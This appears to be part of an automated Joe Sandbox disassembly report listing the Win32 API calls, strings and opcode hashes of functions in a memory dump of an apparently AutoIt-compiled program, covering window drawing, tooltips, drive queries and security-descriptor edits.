                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00C87B67
                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C87B98
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00C87BA4
                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00C87BBE
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00C87BCD
                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00C87BF8
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 00C87C00
                                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00C87C07
                                                                                                                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00C87C16
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C87C1D
                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00C87C68
                                                                                                                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 00C87C9A
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C87CBC
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: GetSysColor.USER32(00000012), ref: 00C87E5B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: SetTextColor.GDI32(?,00C87B2D), ref: 00C87E5F
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: GetSysColorBrush.USER32(0000000F), ref: 00C87E75
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: GetSysColor.USER32(0000000F), ref: 00C87E80
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: GetSysColor.USER32(00000011), ref: 00C87E9D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C87EAB
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: SelectObject.GDI32(?,00000000), ref: 00C87EBC
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: SetBkColor.GDI32(?,?), ref: 00C87EC5
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: SelectObject.GDI32(?,?), ref: 00C87ED2
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00C87EF1
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C87F08
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: GetWindowLongW.USER32(?,000000F0), ref: 00C87F15
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                            • Opcode ID: 230c861809706d42cae9b75cfd45dcb168c8f29b4657dbbce19aba3bb48287b7
                                                                                                                                                                                                                                                                            • Instruction ID: f0d01dd99784ca0d49034def48af3f15e3714a594a80d0abb0979b6ae418b9c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 230c861809706d42cae9b75cfd45dcb168c8f29b4657dbbce19aba3bb48287b7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAA15972008301AFDB11AF64DC48F6EBBA9FF49325F200B19FA63961E0E775D9448B59
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?), ref: 00BF16B4
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C32B07
                                                                                                                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C32B40
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C32F85
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF1488,?,00000000,?,?,?,?,00BF145A,00000000,?), ref: 00BF1865
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00C32FC1
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C32FD8
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C32FEE
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C32FF9
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: a1d2d1e1d324c7c5fa19276efdbfaa54194127bfadf3e8ba4b126f59e3f921e2
                                                                                                                                                                                                                                                                            • Instruction ID: cd3f3f0681d175dc495800f764df7a8ec4dd50bfa228e824bb9c02ba1a201a8b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1d2d1e1d324c7c5fa19276efdbfaa54194127bfadf3e8ba4b126f59e3f921e2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A712BC30210205EFDB25DF18D884BBABBE5FB44304F1889A9F5A5DB261C731ED86DB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 00C7319B
                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C732C7
                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C73306
                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C73316
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C7335D
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00C73369
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C733B2
                                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C733C1
                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C733D1
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C733D5
                                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C733E5
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C733EE
                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00C733F7
                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C73423
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C7343A
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C7347A
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C7348E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C7349F
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C734D4
                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C734DF
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C734EA
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C734F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                            • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                            • Opcode ID: 66c22f67d8c30eb18d164264e35bab713c168d18da1854d180328bcc342a6118
                                                                                                                                                                                                                                                                            • Instruction ID: c09a39e07beb0db9856ff89759fe4388884dbecce378ac71517d5be00bd7f471
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66c22f67d8c30eb18d164264e35bab713c168d18da1854d180328bcc342a6118
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DB15D71A00249AFEB14DFA8DD49FAE7BB9EB48710F008154FA15E72E1DB74AD40CB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C65532
                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00C8DC30,?,\\.\,00C8DCD0), ref: 00C6560F
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00C8DC30,?,\\.\,00C8DCD0), ref: 00C6577B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                            • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                            • Opcode ID: 9f395b0885dab7db49e989982da942d38aef611598b05512cbddc740313c9adb
                                                                                                                                                                                                                                                                            • Instruction ID: e2240b0c6187d2ffd66738e4907380e18934ccc1b1a2207dc4b439a3d4c946c1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f395b0885dab7db49e989982da942d38aef611598b05512cbddc740313c9adb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4361DE30A48A09DFCB34DF24C9D29B877A1EF94390F348165E916AB291C731DE85DB51
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C81BC4
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C81BD9
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C81BE0
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C81C35
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C81C55
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C81C89
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C81CA7
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C81CB9
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 00C81CCE
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00C81CE1
                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 00C81D3D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00C81D58
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00C81D6C
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C81D84
                                                                                                                                                                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00C81DAA
                                                                                                                                                                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00C81DC4
                                                                                                                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 00C81DDB
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 00C81E46
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                            • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                            • Opcode ID: 98a687458cad88765af095c50ccb1f0e15de5c693da1efdcb3c9def54e0aaddf
                                                                                                                                                                                                                                                                            • Instruction ID: 3400f8f0e9ec123b7030cce9011b8b5b6b8820fc536b127064b1bf42c6fbd797
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98a687458cad88765af095c50ccb1f0e15de5c693da1efdcb3c9def54e0aaddf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07B1AB71604301AFD704EF64C884B6EBBE9FF84314F04891CF99A9B2A1D771E945CB9A
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00C80D81
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C80DBB
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C80E25
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C80E8D
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C80F11
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C80F61
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C80FA0
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0FD52: _wcslen.LIBCMT ref: 00C0FD5D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C52BA5
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C52BD7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                            • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                            • Opcode ID: ec45c5406f4faa3284f13f006781a712bce8ab5e82582fa23b27373b86a95c83
                                                                                                                                                                                                                                                                            • Instruction ID: c37057f7cbc417f26ab32f4e1a0b42e7f1d5e7a0575a546c19876f628a18a0f2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec45c5406f4faa3284f13f006781a712bce8ab5e82582fa23b27373b86a95c83
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EE1B1312043418FC754EF24C95187AB7E6BF85318F14896DF8A6973A1DB30EE4ACB55
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF25F8
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00BF2600
                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF262B
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00BF2633
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00BF2658
                                                                                                                                                                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BF2675
                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BF2685
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BF26B8
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BF26CC
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00BF26EA
                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00BF2706
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF2711
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetCursorPos.USER32(?), ref: 00BF19E1
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: ScreenToClient.USER32(00000000,?), ref: 00BF19FE
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetAsyncKeyState.USER32(00000001), ref: 00BF1A23
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetAsyncKeyState.USER32(00000002), ref: 00BF1A3D
                                                                                                                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00BF199C), ref: 00BF2738
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                            • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                            • Opcode ID: e7e8e5d326dbcfa33351a482fdc6bfa46bc3c6ef182187338162f7952e3499ae
                                                                                                                                                                                                                                                                            • Instruction ID: 619d4e01f6c8e5567247635ee3a9c6ee871517a3cd1c55ed809c2059c6aeff70
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7e8e5d326dbcfa33351a482fdc6bfa46bc3c6ef182187338162f7952e3499ae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16B15A71A00209EFDB14DFA8CC95BAE7BB5FB48314F104229FA16AB2D0DB74E941CB55
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51A60
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A6C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A7B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A82
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C51A99
                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C51741
                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C51775
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C5178C
                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C517C6
                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C517E2
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C517F9
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C51801
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C51808
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C51829
                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00C51830
                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C5185F
                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C51881
                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C51893
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C518BA
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C518C1
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C518CA
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C518D1
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C518DA
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C518E1
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C518ED
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C518F4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: GetProcessHeap.KERNEL32(00000008,00C514FD,?,00000000,?,00C514FD,?), ref: 00C51AED
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C514FD,?), ref: 00C51AF4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C514FD,?), ref: 00C51B03
                                                                                                                                                                                                                                                                            Memory Dump Source
